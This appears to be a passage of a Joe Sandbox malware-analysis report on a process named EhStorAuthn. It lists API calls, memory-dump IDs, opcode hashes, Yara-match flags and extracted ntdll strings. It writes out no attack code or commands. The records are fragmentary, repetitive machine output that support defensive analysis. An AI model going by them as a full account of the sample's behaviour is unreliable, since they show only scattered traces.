                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 632 703770-7037b8 call 70b110 635 7038c4-7038ca 632->635 636 7037be-703838 call 70b1f0 call 6f4200 call 6e1410 call 7018d0 632->636 645 703840-703854 Sleep 636->645 646 7038b5-7038bc 645->646 647 703856-703868 645->647 646->645 650 7038be 646->650 648 70388a-7038a3 call 705ca0 647->648 649 70386a-703888 call 705c00 647->649 654 7038a8-7038ab 648->654 649->654 650->635 654->646
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 0070384B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: @J7<
                                                                          • API String ID: 3442037557-2016760708
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: @J7<
                                                                          • API String ID: 3442037557-2016760708
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,006F1A20,00707C7F,>Sp,006F19E6), ref: 006F7E13
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID: (*%]
                                                                          • API String ID: 2340568224-2352047701
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006F4272
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006F4272
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,006F7FAE,00000010,?,?,?,00000044,?,00000010,006F7FAE,?,?,?), ref: 007094D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9D85
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: e7c93a38abf1228622db36281cc93bc58468f8e600e82b1bd5fe5cc0a4fcf8b5
                                                                          • Instruction ID: a3defd0ec5f12186c4e4114b43896de289a0263124ae0bdc6809c8b02c7ec122
                                                                          • Opcode Fuzzy Hash: e7c93a38abf1228622db36281cc93bc58468f8e600e82b1bd5fe5cc0a4fcf8b5
                                                                          • Instruction Fuzzy Hash: A4F06D73781714B6E23172AAAC03FDBB78C8F81BA1F140525F70CEB2C1D996B95146E9
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9D85
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: e6aa190f7e31398a7148b094ed221df3c213dc8f742461f45ac3ce322478bb48
                                                                          • Instruction ID: cef9432ba7d509b87c5ab4194b3e3944107e6f5c62dae03910359566c2fdb5cd
                                                                          • Opcode Fuzzy Hash: e6aa190f7e31398a7148b094ed221df3c213dc8f742461f45ac3ce322478bb48
                                                                          • Instruction Fuzzy Hash: 19F09277681B14B6E23162A5CC03FCB639D8F80B51F250619FB08AB2C1C9E9B9414BB8
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C78BFC45,00000007,00000000,00000004,00000000,006F3ADE,000000F4), ref: 0070941C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction ID: fadae4b6b5e47ac68350894b423cc8ac3532453618ccd092a3580a836a5774c6
                                                                          • Opcode Fuzzy Hash: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction Fuzzy Hash: C6E06D71600304BBD610EE59DC41EAB37EDEFC5710F004419F918A7281D671B91086B4
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(0070148C,?,?,0070148C,00000000,?,?,0070148C,?,00000104), ref: 007093CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction ID: 59191a6155c520b81a0215dbded648456a630b0c0ee6d17f2762248b5a78d013
                                                                          • Opcode Fuzzy Hash: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction Fuzzy Hash: 92E09AB2200304BBC614EE99DC42FDB77ACEFC9710F004429F908A7282D631BE108BB9
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006F801C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 266e54d2a5c894e519d7627c847f60e82b9eb50ec4da42834809acb7b8fb488b
                                                                          • Instruction ID: abda55d484e88593e52090898726728de218edb1fbc8269bb57daa44dfddf182
                                                                          • Opcode Fuzzy Hash: 266e54d2a5c894e519d7627c847f60e82b9eb50ec4da42834809acb7b8fb488b
                                                                          • Instruction Fuzzy Hash: 99E0D8351803081AF6246568DC45BB633595744720F444694B91C8B2C2DDBDE9018250
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006F801C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 641f6e492fe71281946ac1ea3c57cb9cc7923bb0bd7ac1f8e6f2013c034e680d
                                                                          • Instruction ID: 9d34ca6bf3b1374dd8abc55c79eebb81b412dc8c5fdc8e4c2d65a63ee96e475b
                                                                          • Opcode Fuzzy Hash: 641f6e492fe71281946ac1ea3c57cb9cc7923bb0bd7ac1f8e6f2013c034e680d
                                                                          • Instruction Fuzzy Hash: EAE026751803082FFA246668DC46FF6335D5B48734F844294BA589B3C2EDFEFA028250
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 006F0B07
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                          • Instruction ID: de8fe73397a64c5f0219b8b0846e6265fde62fcd25aea69901a90f9810b8fab9
                                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                          • Instruction Fuzzy Hash: 8FD0A967B0000C3AAA024984ACC1CFEB72CEB84AAAF004063FB08E2140E6229D020AB0
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,006F1A20,00707C7F,>Sp,006F19E6), ref: 006F7E13
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 1610dcf2398de1f62d96a91fadeb4b1a8f7b07416db63a1841ff4ecf216ab0c8
                                                                          • Instruction ID: 3c5109fb6201c3420a18c28396f4bf949fceffcf220d1c6c1530ba8194fa01bf
                                                                          • Opcode Fuzzy Hash: 1610dcf2398de1f62d96a91fadeb4b1a8f7b07416db63a1841ff4ecf216ab0c8
                                                                          • Instruction Fuzzy Hash: 3BD05E712813087BF644A6E5CC07F5A36CD4B50764F098468BA4CDB3C2E865EA204AA9
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                                                          • Instruction ID: b66740453366ca3e759c1fb0cc31d147f02d40d7cbd707ac5daf6f805d97e07f
                                                                          • Opcode Fuzzy Hash: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                                                          • Instruction Fuzzy Hash: 2EB09B75D015D5C5FB21F760460871779106BD0705F16C075D2130661F4738D1D5E176
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499176887.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4630000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                          • API String ID: 0-3558027158
                                                                          • Opcode ID: e712ef6fcedd0167f14caea6d25e31619db7c8f51c9f37ec9da743873ecf1e48
                                                                          • Instruction ID: 7e01e7e4c0dfeea4f872cd07c66a3e3704c385bbc8deb1a7ec0819225f222002
                                                                          • Opcode Fuzzy Hash: e712ef6fcedd0167f14caea6d25e31619db7c8f51c9f37ec9da743873ecf1e48
                                                                          • Instruction Fuzzy Hash: 43A151F04482948AC7158F58A0652AFFFB1EBC6305F15816DE6E6BB243C37E8905CB95
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: a313b1e56e73aecdbcc9e016482270e8d579dd703e054b9e951fb2d09bad05e9
                                                                          • Instruction ID: 0838e27a130ff355a95f2cd5e82976ad9327e350b1c97520465880af9d073393
                                                                          • Opcode Fuzzy Hash: a313b1e56e73aecdbcc9e016482270e8d579dd703e054b9e951fb2d09bad05e9
                                                                          • Instruction Fuzzy Hash: FC51C4B5E00156BFDB10DFA88C9097EF7B8BB08304B54816DE559E7746E274FE409BA0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                                                          • Instruction ID: a9e1b6db54377f8e114c12f28d3553769ba0f37f43eb4a774763de6adeedd683
                                                                          • Opcode Fuzzy Hash: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                                                          • Instruction Fuzzy Hash: 6A51E5B1A00645AFDF30DF9CC89097EB7F8EB44205B448E99E496D7641E6B4FA40CBA0
                                                                          Strings
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047F46FC
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047F4742
                                                                          • ExecuteOptions, xrefs: 047F46A0
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 047F4787
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047F4725
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047F4655
                                                                          • Execute=1, xrefs: 047F4713
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                                                          • Instruction ID: 1faa7dc06a3b1457147da765b91097207067f9ca0391dc197d7a0ce1540231f9
                                                                          • Opcode Fuzzy Hash: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                                                          • Instruction Fuzzy Hash: 63510B716002196BEF24AA68DC99FEE73BCEF54308F040499DA45A7390E770BE458F90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: 946d71d189b134fbc13543dfbda6b3efaffd1bf6d540ab27cfc8df5cdd665ebb
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: 5481C070E452499EDF24CE68E8927FEBBB5AF45320F18451EF861A73D1D734B8408B50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499176887.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4630000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AHJ$JKKJ$JUK$KJ[=$NUK[$S#JJ$UKR[
                                                                          • API String ID: 0-2568715265
                                                                          • Opcode ID: 13d4d4ab1fbe26805ea83dc9d5f54d2d3616795f508473ae7966bf8c1dd85d4b
                                                                          • Instruction ID: 2d1848fb7d9ebc23d2e5f8076589b806e327fe8bdfdee46954a5aec26189a59d
                                                                          • Opcode Fuzzy Hash: 13d4d4ab1fbe26805ea83dc9d5f54d2d3616795f508473ae7966bf8c1dd85d4b
                                                                          • Instruction Fuzzy Hash: 471185B080465C8BCF24EF94E4802ECFBB0FB28346F61404DD52ABF245D7785A868F96
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047F02BD
                                                                          • RTL: Re-Waiting, xrefs: 047F031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047F02E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                                                          • Instruction ID: e368b0573ea45718023722d121d015cb1fff70f7ab54bf665ba4dbad640b96d0
                                                                          • Opcode Fuzzy Hash: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                                                          • Instruction Fuzzy Hash: 4DE1AC706087419FE725CF28C884B2AB7E1AF88324F144B6DE5A58B3E1E774F855CB52
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 047F7BAC
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 047F7B7F
                                                                          • RTL: Resource at %p, xrefs: 047F7B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: ef602750cc749f3e4f76122c4245516eede8a8b95973a85ea1673c73c027867c
                                                                          • Instruction ID: 71590d3d16ed0d3dd7ea7b966b39109cb9ee309a388a2e2ffa0352dafda5db34
                                                                          • Opcode Fuzzy Hash: ef602750cc749f3e4f76122c4245516eede8a8b95973a85ea1673c73c027867c
                                                                          • Instruction Fuzzy Hash: 6A41BF317057029FE724DE29CC40BAAB7E5EB89714F100A1DED9ADBB90DB71F8058B91
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047F728C
                                                                          Strings
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047F7294
                                                                          • RTL: Re-Waiting, xrefs: 047F72C1
                                                                          • RTL: Resource at %p, xrefs: 047F72A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                                                          • Instruction ID: 2c8fa0b5586e83afc21070c55a55024793a22bb49c87595ddab77bdf5b28dd24
                                                                          • Opcode Fuzzy Hash: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                                                          • Instruction Fuzzy Hash: 9041EF31701202AFE724DE65CD41BAAB7A5FB84714F104A19FE95EB780DB60F8429BD2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
